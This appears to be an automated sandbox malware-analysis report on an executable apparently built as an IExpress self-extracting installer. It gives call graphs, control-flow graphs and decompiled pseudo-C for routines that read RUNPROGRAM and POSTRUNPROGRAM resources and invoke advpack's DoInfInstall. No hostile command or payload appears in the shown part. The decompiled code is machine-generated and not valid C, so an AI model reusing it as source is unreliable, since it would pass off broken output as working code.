74->34 74->48 74->51 74->56 74->57 74->58 74->84 74->99 75->11 75->53 75->58 75->99 76 Function_01066FA1 78 Function_01062AAC 78->53 91 Function_010617C8 78->91 78->99 112 Function_010665E8 78->112 79 Function_01062CAA 79->8 79->57 79->63 79->65 79->72 79->84 79->99 104 Function_010636EE 79->104 80 Function_010652B6 80->56 80->63 80->99 103 Function_01061FE1 80->103 80->112 81->56 82 Function_010669B0 82->2 82->46 83 Function_01066FBE 82->83 107 Function_010671EF 82->107 83->29 84->11 84->13 84->53 92 Function_010667C9 84->92 84->99 85 Function_01064CC0 86 Function_01064BC0 87 Function_010630C0 88 Function_010663C0 88->56 88->58 88->99 89->51 89->53 89->58 89->84 90->28 92->62 93 Function_01064AD0 93->54 94 Function_01064CD0 94->0 94->22 94->37 94->42 94->52 94->67 94->99 101 Function_010647E0 94->101 95->99 96->51 96->57 96->84 97->57 97->84 117 Function_01064EFD 97->117 98->58 98->99 99->113 101->53 101->84 102 Function_010619E0 102->95 102->99 104->13 104->60 104->84 104->92 104->99 111 Function_010628E8 104->111 105->99 106->15 106->51 106->84 106->99 108 Function_01066BEF 109 Function_010670EB 110->11 110->50 110->53 110->56 110->58 110->78 110->81 110->84 110->90 110->99 111->44 111->60 114 Function_010634F0 114->54 114->84 114->95 115 Function_01066EF0 116 Function_010670FE 117->37 117->52 117->99 118->14 118->64 118->79 118->80

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 36 1063ba2-1063bd9 37 1063bfd-1063bff 36->37 38 1063bdb-1063bee call 106468f 36->38 40 1063c03-1063c28 memset 37->40 44 1063bf4-1063bf7 38->44 45 1063d13-1063d30 call 10644b9 38->45 42 1063d35-1063d48 call 1061781 40->42 43 1063c2e-1063c40 call 106468f 40->43 49 1063d4d-1063d52 42->49 43->45 54 1063c46-1063c49 43->54 44->37 44->45 55 1063f4d 45->55 52 1063d54-1063d6c call 106468f 49->52 53 1063d9e-1063db6 call 1061ae8 49->53 52->45 65 1063d6e-1063d75 52->65 53->55 69 1063dbc-1063dc2 53->69 54->45 57 1063c4f-1063c56 54->57 59 1063f4f-1063f63 call 1066ce0 55->59 61 1063c60-1063c65 57->61 62 1063c58-1063c5e 57->62 67 1063c67-1063c6d 61->67 68 1063c75-1063c7c 61->68 66 1063c6e-1063c73 62->66 71 1063fda-1063fe1 65->71 72 1063d7b-1063d98 CompareStringA 65->72 73 1063c87-1063c89 66->73 67->66 68->73 76 1063c7e-1063c82 68->76 74 1063de6-1063de8 69->74 75 1063dc4-1063dce 69->75 80 1063fe3 call 1062267 71->80 81 1063fe8-1063fea 71->81 72->53 72->71 73->49 77 1063c8f-1063c98 73->77 78 1063dee-1063df5 74->78 79 1063f0b-1063f15 call 1063fef 74->79 75->74 82 1063dd0-1063dd7 75->82 76->73 84 1063cf1-1063cf3 77->84 85 1063c9a-1063c9c 77->85 86 1063fab-1063fd2 call 10644b9 LocalFree 78->86 87 1063dfb-1063dfd 78->87 96 1063f1a-1063f1c 79->96 80->81 81->59 82->74 83 1063dd9-1063ddb 82->83 83->78 90 1063ddd-1063de1 call 106202a 83->90 84->53 95 1063cf9-1063d11 call 106468f 84->95 92 1063ca5-1063ca7 85->92 93 1063c9e-1063ca3 85->93 86->55 87->79 94 1063e03-1063e0a 87->94 90->74 92->55 102 1063cad 92->102 101 1063cb2-1063cc5 call 106468f 93->101 94->79 103 1063e10-1063e19 call 1066495 94->103 95->45 95->49 97 1063f46-1063f47 LocalFree 96->97 98 1063f1e-1063f2d LocalFree 96->98 97->55 105 1063fd7-1063fd9 98->105 106 1063f33-1063f3b 98->106 101->45 112 1063cc7-1063ce8 CompareStringA 101->112 102->101 113 1063f92-1063fa9 call 10644b9 103->113 114 1063e1f-1063e36 GetProcAddress 103->114 105->71 106->40 112->84 115 1063cea-1063ced 112->115 123 1063f7c-1063f90 LocalFree call 1066285 113->123 116 1063f64-1063f76 call 10644b9 FreeLibrary 114->116 117 1063e3c-1063e80 114->117 115->84 116->123 121 1063e82-1063e87 117->121 122 1063e8b-1063e94 117->122 121->122 125 1063e96-1063e9b 122->125 126 1063e9f-1063ea2 122->126 123->55 125->126 127 1063ea4-1063ea9 126->127 128 1063ead-1063eb6 126->128 127->128 130 1063ec1-1063ec3 128->130 131 1063eb8-1063ebd 128->131 133 1063ec5-1063eca 130->133 134 1063ece-1063eec 130->134 131->130 133->134 137 1063ef5-1063efd 134->137 138 1063eee-1063ef3 134->138 139 1063f40 FreeLibrary 137->139 140 1063eff-1063f09 FreeLibrary 137->140 138->137 139->97 140->98
                                                C-Code - Quality: 82%
                                                			E01063BA2() {
                                                				signed int _v8;
                                                				signed int _v12;
                                                				char _v276;
                                                				char _v280;
                                                				short _v300;
                                                				intOrPtr _v304;
                                                				void _v348;
                                                				char _v352;
                                                				intOrPtr _v356;
                                                				signed int _v360;
                                                				short _v364;
                                                				char* _v368;
                                                				intOrPtr _v372;
                                                				void* _v376;
                                                				intOrPtr _v380;
                                                				char _v384;
                                                				signed int _v388;
                                                				intOrPtr _v392;
                                                				signed int _v396;
                                                				signed int _v400;
                                                				signed int _v404;
                                                				void* _v408;
                                                				void* _v424;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t69;
                                                				signed int _t76;
                                                				void* _t77;
                                                				signed int _t79;
                                                				short _t96;
                                                				signed int _t97;
                                                				intOrPtr _t98;
                                                				signed int _t101;
                                                				signed int _t104;
                                                				signed int _t108;
                                                				int _t112;
                                                				void* _t115;
                                                				signed char _t118;
                                                				void* _t125;
                                                				signed int _t127;
                                                				void* _t128;
                                                				struct HINSTANCE__* _t129;
                                                				void* _t130;
                                                				short _t137;
                                                				char* _t140;
                                                				signed char _t144;
                                                				signed char _t145;
                                                				signed int _t149;
                                                				void* _t150;
                                                				void* _t151;
                                                				signed int _t153;
                                                				void* _t155;
                                                				void* _t156;
                                                				signed int _t157;
                                                				signed int _t162;
                                                				signed int _t164;
                                                				void* _t165;
                                                
                                                				_t164 = (_t162 & 0xfffffff8) - 0x194;
                                                				_t69 =  *0x1068004; // 0x19e58fb5
                                                				_v8 = _t69 ^ _t164;
                                                				_t153 = 0;
                                                				 *0x1069124 =  *0x1069124 & 0;
                                                				_t149 = 0;
                                                				_v388 = 0;
                                                				_v384 = 0;
                                                				_t165 =  *0x1068a28 - _t153; // 0x0
                                                				if(_t165 != 0) {
                                                					L3:
                                                					_t127 = 0;
                                                					_v392 = 0;
                                                					while(1) {
                                                						_v400 = _v400 & 0x00000000;
                                                						memset( &_v348, 0, 0x44);
                                                						_t164 = _t164 + 0xc;
                                                						_v348 = 0x44;
                                                						if( *0x1068c42 != 0) {
                                                							goto L26;
                                                						}
                                                						_t146 =  &_v396;
                                                						_t115 = E0106468F("SHOWWINDOW",  &_v396, 4);
                                                						if(_t115 == 0 || _t115 > 4) {
                                                							L25:
                                                							_t146 = 0x4b1;
                                                							E010644B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                							 *0x1069124 = 0x80070714;
                                                							goto L62;
                                                						} else {
                                                							if(_v396 != 1) {
                                                								__eflags = _v396 - 2;
                                                								if(_v396 != 2) {
                                                									_t137 = 3;
                                                									__eflags = _v396 - _t137;
                                                									if(_v396 == _t137) {
                                                										_v304 = 1;
                                                										_v300 = _t137;
                                                									}
                                                									goto L14;
                                                								}
                                                								_push(6);
                                                								_v304 = 1;
                                                								_pop(0);
                                                								goto L11;
                                                							} else {
                                                								_v304 = 1;
                                                								L11:
                                                								_v300 = 0;
                                                								L14:
                                                								if(_t127 != 0) {
                                                									L27:
                                                									_t155 = 1;
                                                									__eflags = _t127 - 1;
                                                									if(_t127 != 1) {
                                                										L31:
                                                										_t132 =  &_v280;
                                                										_t76 = E01061AE8( &_v280,  &_v408,  &_v404); // executed
                                                										__eflags = _t76;
                                                										if(_t76 == 0) {
                                                											L62:
                                                											_t77 = 0;
                                                											L63:
                                                											_pop(_t150);
                                                											_pop(_t156);
                                                											_pop(_t128);
                                                											return E01066CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
                                                										}
                                                										_t157 = _v404;
                                                										__eflags = _t149;
                                                										if(_t149 != 0) {
                                                											L37:
                                                											__eflags = _t157;
                                                											if(_t157 == 0) {
                                                												L57:
                                                												_t151 = _v408;
                                                												_t146 =  &_v352;
                                                												_t130 = _t151; // executed
                                                												_t79 = E01063FEF(_t130,  &_v352); // executed
                                                												__eflags = _t79;
                                                												if(_t79 == 0) {
                                                													L61:
                                                													LocalFree(_t151);
                                                													goto L62;
                                                												}
                                                												L58:
                                                												LocalFree(_t151);
                                                												_t127 = _t127 + 1;
                                                												_v396 = _t127;
                                                												__eflags = _t127 - 2;
                                                												if(_t127 >= 2) {
                                                													_t155 = 1;
                                                													__eflags = 1;
                                                													L69:
                                                													__eflags =  *0x1068580;
                                                													if( *0x1068580 != 0) {
                                                														E01062267();
                                                													}
                                                													_t77 = _t155;
                                                													goto L63;
                                                												}
                                                												_t153 = _v392;
                                                												_t149 = _v388;
                                                												continue;
                                                											}
                                                											L38:
                                                											__eflags =  *0x1068180;
                                                											if( *0x1068180 == 0) {
                                                												_t146 = 0x4c7;
                                                												E010644B9(0, 0x4c7, 0, 0, 0x10, 0);
                                                												LocalFree(_v424);
                                                												 *0x1069124 = 0x8007042b;
                                                												goto L62;
                                                											}
                                                											__eflags = _t157;
                                                											if(_t157 == 0) {
                                                												goto L57;
                                                											}
                                                											__eflags =  *0x1069a34 & 0x00000004;
                                                											if(__eflags == 0) {
                                                												goto L57;
                                                											}
                                                											_t129 = E01066495(_t127, _t132, _t157, __eflags);
                                                											__eflags = _t129;
                                                											if(_t129 == 0) {
                                                												_t146 = 0x4c8;
                                                												E010644B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
                                                												L65:
                                                												LocalFree(_v408);
                                                												 *0x1069124 = E01066285();
                                                												goto L62;
                                                											}
                                                											_t146 = GetProcAddress(_t129, "DoInfInstall");
                                                											_v404 = _t146;
                                                											__eflags = _t146;
                                                											if(_t146 == 0) {
                                                												_t146 = 0x4c9;
                                                												__eflags = 0;
                                                												E010644B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
                                                												FreeLibrary(_t129);
                                                												goto L65;
                                                											}
                                                											__eflags =  *0x1068a30;
                                                											_t151 = _v408;
                                                											_v384 = 0;
                                                											_v368 =  &_v280;
                                                											_t96 =  *0x1069a40; // 0x3
                                                											_v364 = _t96;
                                                											_t97 =  *0x1068a38 & 0x0000ffff;
                                                											_v380 = 0x1069154;
                                                											_v376 = _t151;
                                                											_v372 = 0x10691e4;
                                                											_v360 = _t97;
                                                											if( *0x1068a30 != 0) {
                                                												_t97 = _t97 | 0x00010000;
                                                												__eflags = _t97;
                                                												_v360 = _t97;
                                                											}
                                                											_t144 =  *0x1069a34; // 0x1
                                                											__eflags = _t144 & 0x00000008;
                                                											if((_t144 & 0x00000008) != 0) {
                                                												_t97 = _t97 | 0x00020000;
                                                												__eflags = _t97;
                                                												_v360 = _t97;
                                                											}
                                                											__eflags = _t144 & 0x00000010;
                                                											if((_t144 & 0x00000010) != 0) {
                                                												_t97 = _t97 | 0x00040000;
                                                												__eflags = _t97;
                                                												_v360 = _t97;
                                                											}
                                                											_t145 =  *0x1068d48; // 0x0
                                                											__eflags = _t145 & 0x00000040;
                                                											if((_t145 & 0x00000040) != 0) {
                                                												_t97 = _t97 | 0x00080000;
                                                												__eflags = _t97;
                                                												_v360 = _t97;
                                                											}
                                                											__eflags = _t145;
                                                											if(_t145 < 0) {
                                                												_t104 = _t97 | 0x00100000;
                                                												__eflags = _t104;
                                                												_v360 = _t104;
                                                											}
                                                											_t98 =  *0x1069a38; // 0x0
                                                											_v356 = _t98;
                                                											_t130 = _t146;
                                                											 *0x106a288( &_v384);
                                                											_t101 = _v404();
                                                											__eflags = _t164 - _t164;
                                                											if(_t164 != _t164) {
                                                												_t130 = 4;
                                                												asm("int 0x29");
                                                											}
                                                											 *0x1069124 = _t101;
                                                											_push(_t129);
                                                											__eflags = _t101;
                                                											if(_t101 < 0) {
                                                												FreeLibrary();
                                                												goto L61;
                                                											} else {
                                                												FreeLibrary();
                                                												_t127 = _v400;
                                                												goto L58;
                                                											}
                                                										}
                                                										__eflags =  *0x1069a40 - 1; // 0x3
                                                										if(__eflags == 0) {
                                                											goto L37;
                                                										}
                                                										__eflags =  *0x1068a20;
                                                										if( *0x1068a20 == 0) {
                                                											goto L37;
                                                										}
                                                										__eflags = _t157;
                                                										if(_t157 != 0) {
                                                											goto L38;
                                                										}
                                                										_v388 = 1;
                                                										E0106202A(_t146); // executed
                                                										goto L37;
                                                									}
                                                									_t146 =  &_v280;
                                                									_t108 = E0106468F("POSTRUNPROGRAM",  &_v280, 0x104);
                                                									__eflags = _t108;
                                                									if(_t108 == 0) {
                                                										goto L25;
                                                									}
                                                									__eflags =  *0x1068c42;
                                                									if( *0x1068c42 != 0) {
                                                										goto L69;
                                                									}
                                                									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
                                                									__eflags = _t112 == 0;
                                                									if(_t112 == 0) {
                                                										goto L69;
                                                									}
                                                									goto L31;
                                                								}
                                                								_t118 =  *0x1068a38; // 0x0
                                                								if(_t118 == 0) {
                                                									L23:
                                                									if(_t153 != 0) {
                                                										goto L31;
                                                									}
                                                									_t146 =  &_v276;
                                                									if(E0106468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
                                                										goto L27;
                                                									}
                                                									goto L25;
                                                								}
                                                								if((_t118 & 0x00000001) == 0) {
                                                									__eflags = _t118 & 0x00000002;
                                                									if((_t118 & 0x00000002) == 0) {
                                                										goto L62;
                                                									}
                                                									_t140 = "USRQCMD";
                                                									L20:
                                                									_t146 =  &_v276;
                                                									if(E0106468F(_t140,  &_v276, 0x104) == 0) {
                                                										goto L25;
                                                									}
                                                									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
                                                										_t153 = 1;
                                                										_v388 = 1;
                                                									}
                                                									goto L23;
                                                								}
                                                								_t140 = "ADMQCMD";
                                                								goto L20;
                                                							}
                                                						}
                                                						L26:
                                                						_push(_t130);
                                                						_t146 = 0x104;
                                                						E01061781( &_v276, 0x104, _t130, 0x1068c42);
                                                						goto L27;
                                                					}
                                                				}
                                                				_t130 = "REBOOT";
                                                				_t125 = E0106468F(_t130, 0x1069a2c, 4);
                                                				if(_t125 == 0 || _t125 > 4) {
                                                					goto L25;
                                                				} else {
                                                					goto L3;
                                                				}
                                                			}





























































                                                0x01063baa
                                                0x01063bb0
                                                0x01063bb7
                                                0x01063bc0
                                                0x01063bc2
                                                0x01063bc9
                                                0x01063bcb
                                                0x01063bcf
                                                0x01063bd3
                                                0x01063bd9
                                                0x01063bfd
                                                0x01063bfd
                                                0x01063bff
                                                0x01063c03
                                                0x01063c03
                                                0x01063c11
                                                0x01063c16
                                                0x01063c19
                                                0x01063c28
                                                0x00000000
                                                0x00000000
                                                0x01063c30
                                                0x01063c39
                                                0x01063c40
                                                0x01063d13
                                                0x01063d15
                                                0x01063d21
                                                0x01063d26
                                                0x00000000
                                                0x01063c4f
                                                0x01063c56
                                                0x01063c60
                                                0x01063c65
                                                0x01063c77
                                                0x01063c78
                                                0x01063c7c
                                                0x01063c7e
                                                0x01063c82
                                                0x01063c82
                                                0x00000000
                                                0x01063c7c
                                                0x01063c67
                                                0x01063c69
                                                0x01063c6d
                                                0x00000000
                                                0x01063c58
                                                0x01063c58
                                                0x01063c6e
                                                0x01063c6e
                                                0x01063c87
                                                0x01063c89
                                                0x01063d4d
                                                0x01063d4f
                                                0x01063d50
                                                0x01063d52
                                                0x01063d9e
                                                0x01063da8
                                                0x01063daf
                                                0x01063db4
                                                0x01063db6
                                                0x01063f4d
                                                0x01063f4d
                                                0x01063f4f
                                                0x01063f56
                                                0x01063f57
                                                0x01063f58
                                                0x01063f63
                                                0x01063f63
                                                0x01063dbc
                                                0x01063dc0
                                                0x01063dc2
                                                0x01063de6
                                                0x01063de6
                                                0x01063de8
                                                0x01063f0b
                                                0x01063f0b
                                                0x01063f0f
                                                0x01063f13
                                                0x01063f15
                                                0x01063f1a
                                                0x01063f1c
                                                0x01063f46
                                                0x01063f47
                                                0x00000000
                                                0x01063f47
                                                0x01063f1e
                                                0x01063f1f
                                                0x01063f25
                                                0x01063f26
                                                0x01063f2a
                                                0x01063f2d
                                                0x01063fd9
                                                0x01063fd9
                                                0x01063fda
                                                0x01063fda
                                                0x01063fe1
                                                0x01063fe3
                                                0x01063fe3
                                                0x01063fe8
                                                0x00000000
                                                0x01063fe8
                                                0x01063f33
                                                0x01063f37
                                                0x00000000
                                                0x01063f37
                                                0x01063dee
                                                0x01063dee
                                                0x01063df5
                                                0x01063fad
                                                0x01063fb9
                                                0x01063fc2
                                                0x01063fc8
                                                0x00000000
                                                0x01063fc8
                                                0x01063dfb
                                                0x01063dfd
                                                0x00000000
                                                0x00000000
                                                0x01063e03
                                                0x01063e0a
                                                0x00000000
                                                0x00000000
                                                0x01063e15
                                                0x01063e17
                                                0x01063e19
                                                0x01063f94
                                                0x01063fa4
                                                0x01063f7c
                                                0x01063f80
                                                0x01063f8b
                                                0x00000000
                                                0x01063f8b
                                                0x01063e2c
                                                0x01063e30
                                                0x01063e34
                                                0x01063e36
                                                0x01063f69
                                                0x01063f6e
                                                0x01063f70
                                                0x01063f76
                                                0x00000000
                                                0x01063f76
                                                0x01063e3c
                                                0x01063e43
                                                0x01063e47
                                                0x01063e52
                                                0x01063e56
                                                0x01063e5c
                                                0x01063e61
                                                0x01063e68
                                                0x01063e70
                                                0x01063e74
                                                0x01063e7c
                                                0x01063e80
                                                0x01063e82
                                                0x01063e82
                                                0x01063e87
                                                0x01063e87
                                                0x01063e8b
                                                0x01063e91
                                                0x01063e94
                                                0x01063e96
                                                0x01063e96
                                                0x01063e9b
                                                0x01063e9b
                                                0x01063e9f
                                                0x01063ea2
                                                0x01063ea4
                                                0x01063ea4
                                                0x01063ea9
                                                0x01063ea9
                                                0x01063ead
                                                0x01063eb3
                                                0x01063eb6
                                                0x01063eb8
                                                0x01063eb8
                                                0x01063ebd
                                                0x01063ebd
                                                0x01063ec1
                                                0x01063ec3
                                                0x01063ec5
                                                0x01063ec5
                                                0x01063eca
                                                0x01063eca
                                                0x01063ece
                                                0x01063ed5
                                                0x01063ed9
                                                0x01063ee0
                                                0x01063ee6
                                                0x01063eea
                                                0x01063eec
                                                0x01063eee
                                                0x01063ef3
                                                0x01063ef3
                                                0x01063ef5
                                                0x01063efa
                                                0x01063efb
                                                0x01063efd
                                                0x01063f40
                                                0x00000000
                                                0x01063eff
                                                0x01063eff
                                                0x01063f05
                                                0x00000000
                                                0x01063f05
                                                0x01063efd
                                                0x01063dc7
                                                0x01063dce
                                                0x00000000
                                                0x00000000
                                                0x01063dd0
                                                0x01063dd7
                                                0x00000000
                                                0x00000000
                                                0x01063dd9
                                                0x01063ddb
                                                0x00000000
                                                0x00000000
                                                0x01063ddd
                                                0x01063de1
                                                0x00000000
                                                0x01063de1
                                                0x01063d59
                                                0x01063d65
                                                0x01063d6a
                                                0x01063d6c
                                                0x00000000
                                                0x00000000
                                                0x01063d6e
                                                0x01063d75
                                                0x00000000
                                                0x00000000
                                                0x01063d8f
                                                0x01063d96
                                                0x01063d98
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x01063d98
                                                0x01063c8f
                                                0x01063c98
                                                0x01063cf1
                                                0x01063cf3
                                                0x00000000
                                                0x00000000
                                                0x01063cfe
                                                0x01063d11
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x01063d11
                                                0x01063c9c
                                                0x01063ca5
                                                0x01063ca7
                                                0x00000000
                                                0x00000000
                                                0x01063cad
                                                0x01063cb2
                                                0x01063cb7
                                                0x01063cc5
                                                0x00000000
                                                0x00000000
                                                0x01063ce8
                                                0x01063cec
                                                0x01063ced
                                                0x01063ced
                                                0x00000000
                                                0x01063ce8
                                                0x01063c9e
                                                0x00000000
                                                0x01063c9e
                                                0x01063c56
                                                0x01063d35
                                                0x01063d35
                                                0x01063d3c
                                                0x01063d48
                                                0x00000000
                                                0x01063d48
                                                0x01063c03
                                                0x01063be2
                                                0x01063be7
                                                0x01063bee
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000

                                                APIs
                                                • memset.MSVCRT ref: 01063C11
                                                • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 01063CDC
                                                  • Part of subcall function 0106468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010646A0
                                                  • Part of subcall function 0106468F: SizeofResource.KERNEL32(00000000,00000000,?,01062D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010646A9
                                                  • Part of subcall function 0106468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010646C3
                                                  • Part of subcall function 0106468F: LoadResource.KERNEL32(00000000,00000000,?,01062D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010646CC
                                                  • Part of subcall function 0106468F: LockResource.KERNEL32(00000000,?,01062D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010646D3
                                                  • Part of subcall function 0106468F: memcpy_s.MSVCRT ref: 010646E5
                                                  • Part of subcall function 0106468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010646EF
                                                • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,01068C42), ref: 01063D8F
                                                • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 01063E26
                                                • FreeLibrary.KERNEL32(00000000,?,01068C42), ref: 01063EFF
                                                • LocalFree.KERNEL32(?,?,?,?,01068C42), ref: 01063F1F
                                                • FreeLibrary.KERNEL32(00000000,?,01068C42), ref: 01063F40
                                                • LocalFree.KERNEL32(?,?,?,?,01068C42), ref: 01063F47
                                                • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,01068C42), ref: 01063F76
                                                • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,01068C42), ref: 01063F80
                                                • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,01068C42), ref: 01063FC2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                                                • Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_1060000_will6283.jbxd
                                                Similarity
                                                • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                                                • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$lega
                                                • API String ID: 1032054927-3529754943
                                                • Opcode ID: 3a2e4f5bc7bb6d6feca019046d3a27cf6aa7eb2b3faf9100994836e9bf755b35
                                                • Instruction ID: 8ebfb37837e59c381b9e7f326b8f019cc84b9ea67c5d8d5b6b6dde4777804336
                                                • Opcode Fuzzy Hash: 3a2e4f5bc7bb6d6feca019046d3a27cf6aa7eb2b3faf9100994836e9bf755b35
                                                • Instruction Fuzzy Hash: BAB1CF70604301DFE770AF289845B6B7AECFB94714F10492EFAC9DA195DB7A8844CBD2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 141 1061ae8-1061b2c call 1061680 144 1061b2e-1061b39 141->144 145 1061b3b-1061b40 141->145 146 1061b46-1061b61 call 1061a84 144->146 145->146 149 1061b63-1061b65 146->149 150 1061b9f-1061bc2 call 1061781 call 106658a 146->150 151 1061b68-1061b6d 149->151 157 1061bc7-1061bd3 call 10666c8 150->157 151->151 153 1061b6f-1061b74 151->153 153->150 156 1061b76-1061b7b 153->156 158 1061b83-1061b86 156->158 159 1061b7d-1061b81 156->159 165 1061d73-1061d7f call 10666c8 157->165 166 1061bd9-1061bf1 CompareStringA 157->166 158->150 162 1061b88-1061b8a 158->162 159->158 161 1061b8c-1061b9d call 1061680 159->161 161->157 162->150 162->161 175 1061d81-1061d99 CompareStringA 165->175 176 1061df8-1061e09 LocalAlloc 165->176 166->165 168 1061bf7-1061c07 GetFileAttributesA 166->168 170 1061d53-1061d5e 168->170 171 1061c0d-1061c15 168->171 173 1061d64-1061d6e call 10644b9 170->173 171->170 174 1061c1b-1061c33 call 1061a84 171->174 187 1061e94-1061ea4 call 1066ce0 173->187 189 1061c35-1061c38 174->189 190 1061c50-1061c61 LocalAlloc 174->190 175->176 181 1061d9b-1061da2 175->181 178 1061dd4-1061ddf 176->178 179 1061e0b-1061e1b GetFileAttributesA 176->179 178->173 183 1061e67-1061e73 call 1061680 179->183 184 1061e1d-1061e1f 179->184 186 1061da5-1061daa 181->186 193 1061e78-1061e84 call 1062aac 183->193 184->183 188 1061e21-1061e3e call 1061781 184->188 186->186 191 1061dac-1061db4 186->191 188->193 210 1061e40-1061e43 188->210 196 1061c40-1061c4b call 1061a84 189->196 197 1061c3a 189->197 190->178 199 1061c67-1061c72 190->199 198 1061db7-1061dbc 191->198 209 1061e89-1061e92 193->209 196->190 197->196 198->198 206 1061dbe-1061dd2 LocalAlloc 198->206 200 1061c74 199->200 201 1061c79-1061cc0 GetPrivateProfileIntA GetPrivateProfileStringA 199->201 200->201 207 1061cc2-1061ccc 201->207 208 1061cf8-1061d07 201->208 206->178 211 1061de1-1061df3 call 106171e 206->211 213 1061cd3-1061cf3 call 1061680 * 2 207->213 214 1061cce 207->214 216 1061d23 208->216 217 1061d09-1061d21 GetShortPathNameA 208->217 209->187 210->193 215 1061e45-1061e65 call 10616b3 * 2 210->215 211->209 213->209 214->213 215->193 221 1061d28-1061d2b 216->221 217->221 224 1061d32-1061d4e call 106171e 221->224 225 1061d2d 221->225 224->209 225->224
                                                C-Code - Quality: 82%
                                                			E01061AE8(long __ecx, CHAR** _a4, int* _a8) {
                                                				signed int _v8;
                                                				char _v268;
                                                				char _v527;
                                                				char _v528;
                                                				char _v1552;
                                                				CHAR* _v1556;
                                                				int* _v1560;
                                                				CHAR** _v1564;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t48;
                                                				CHAR* _t53;
                                                				CHAR* _t54;
                                                				char* _t57;
                                                				char* _t58;
                                                				CHAR* _t60;
                                                				void* _t62;
                                                				signed char _t65;
                                                				intOrPtr _t76;
                                                				intOrPtr _t77;
                                                				unsigned int _t85;
                                                				CHAR* _t90;
                                                				CHAR* _t92;
                                                				char _t105;
                                                				char _t106;
                                                				CHAR** _t111;
                                                				CHAR* _t115;
                                                				intOrPtr* _t125;
                                                				void* _t126;
                                                				CHAR* _t132;
                                                				CHAR* _t135;
                                                				void* _t138;
                                                				void* _t139;
                                                				void* _t145;
                                                				intOrPtr* _t146;
                                                				char* _t148;
                                                				CHAR* _t151;
                                                				void* _t152;
                                                				CHAR* _t155;
                                                				CHAR* _t156;
                                                				void* _t157;
                                                				signed int _t158;
                                                
                                                				_t48 =  *0x1068004; // 0x19e58fb5
                                                				_v8 = _t48 ^ _t158;
                                                				_t108 = __ecx;
                                                				_v1564 = _a4;
                                                				_v1560 = _a8;
                                                				E01061680( &_v528, 0x104, __ecx);
                                                				if(_v528 != 0x22) {
                                                					_t135 = " ";
                                                					_t53 =  &_v528;
                                                				} else {
                                                					_t135 = "\"";
                                                					_t53 =  &_v527;
                                                				}
                                                				_t111 =  &_v1556;
                                                				_v1556 = _t53;
                                                				_t54 = E01061A84(_t111, _t135);
                                                				_t156 = _v1556;
                                                				_t151 = _t54;
                                                				if(_t156 == 0) {
                                                					L12:
                                                					_push(_t111);
                                                					E01061781( &_v268, 0x104, _t111, "C:\Users\alfons\AppData\Local\Temp\IXP001.TMP\");
                                                					E0106658A( &_v268, 0x104, _t156);
                                                					goto L13;
                                                				} else {
                                                					_t132 = _t156;
                                                					_t148 =  &(_t132[1]);
                                                					do {
                                                						_t105 =  *_t132;
                                                						_t132 =  &(_t132[1]);
                                                					} while (_t105 != 0);
                                                					_t111 = _t132 - _t148;
                                                					if(_t111 < 3) {
                                                						goto L12;
                                                					}
                                                					_t106 = _t156[1];
                                                					if(_t106 != 0x3a || _t156[2] != 0x5c) {
                                                						if( *_t156 != 0x5c || _t106 != 0x5c) {
                                                							goto L12;
                                                						} else {
                                                							goto L11;
                                                						}
                                                					} else {
                                                						L11:
                                                						E01061680( &_v268, 0x104, _t156);
                                                						L13:
                                                						_t138 = 0x2e;
                                                						_t57 = E010666C8(_t156, _t138);
                                                						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
                                                							_t139 = 0x2e;
                                                							_t115 = _t156;
                                                							_t58 = E010666C8(_t115, _t139);
                                                							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
                                                								_t156 = LocalAlloc(0x40, 0x400);
                                                								if(_t156 == 0) {
                                                									goto L43;
                                                								}
